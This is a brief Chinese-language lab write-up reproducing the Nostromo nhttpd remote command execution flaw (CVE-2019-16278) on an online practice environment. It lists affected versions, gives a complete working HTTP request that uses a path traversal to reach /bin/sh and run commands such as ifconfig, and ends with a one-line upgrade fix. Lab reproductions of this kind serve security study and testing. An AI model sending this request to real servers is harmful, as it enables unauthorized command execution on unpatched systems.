Nostromo 远程命令执行(CVE-2019-16278)复现
框架介绍:
Nostromo web server(nhttpd)是一个开源的web服务器,在Unix系统非常流行。
影响版本:
nhttpd:version <= 1.9.6
环境搭建:
这里采用在线环境 地址
漏洞复现:
访问首页
burp抓包,构造注入命令
POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0
Host: vulfocus.fofa.so:34940
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
echo
echo
ifconfig 2>&1
这里要注意HTTP/1.0必须时1.0
发现命令执行成功
漏洞修复:
根据官方,升级到安全版本